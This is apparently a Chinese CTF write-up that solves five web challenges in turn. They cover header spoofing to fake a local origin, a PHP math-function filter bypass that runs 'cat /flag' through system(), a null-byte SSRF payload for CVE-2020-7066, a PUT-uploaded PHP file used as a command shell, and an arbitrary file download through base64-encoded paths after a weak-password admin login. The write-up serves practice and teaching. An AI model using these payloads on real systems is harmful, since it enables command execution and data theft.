[极客大挑战 2019]Http

f12,发现有secret.php,手动访问,发现提示不是从xx转过来

修改包:

Referer: https://Sycsecret.buuoj.cn

新任务是浏览器,修改包:

User-Agent: Syclover

说只能本地读取,xxf

X-Forwarded-For: 127.0.0.1

获得flag

[CISCN 2019 初赛]Love Math

限制长度,过滤了一些字符,有白名单,过滤白名单外的函数

贴了给常见数学函数,我们用进制转换就好,由于对c有过滤考虑传入a,b对其进行命令拼接

1
c=($_GET[a])($_GET[b])&a=system&b=cat /flag

将其转义

1
c=$pi=_GET;&&pi{pi}($$pi{abs})&pi=system&abs=cat /flag

pi{pi}和$$pi{abs}访问了pi下的pi和abs,相当于

1
$__GET[a] ($_GET[b])

将_GET转义

1
c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

dechex将十进制转换为16进制,dechex(1598506324)=5f474554,base_convert(37907361743,10,36)将37907361743转为36进制,值为hex2bin,hex2bin(5f474554)=_GET

传入即可

参考https://www.bilibili.com/read/cv18827663/

[GKCTF 2020]cve版签到

image-20240727114308371

抓包,发现有url传参,猜测是ssrf

没有反应

存在cve-2020-7066

get_headers()含0字符截断

You just view *.ctfhub.com提示以

*.ctfhub.com结尾

payload:?url=http://127.0.0.1%00www.ctfhub.com

主机名要以123结尾

image-20240727115127899

[NSSRound#1 Basic]basic_check

发送put请求

image-20240727115957998

http://node4.anna.nssctf.cn:28929/1.php?ifyou=cat%20/flag

可以看到1.php被创建

在1.php下传参

image-20240727120346225

[GKCTF 2021]easycms

存在admin.php

弱口令:admin 12345

登录成功

存在导出页面

下载链接

http://node4.anna.nssctf.cn:28644/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=

存在任意文件下载

更改后面的编码部分为flag

http://d8add87d-fe2f-40da-90b7-96c7144744dd.node4.buuoj.cn/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=

修改为txtz=得flag

NSSCTF{eaa91728-9290-4887-9b95-42e6837108dc}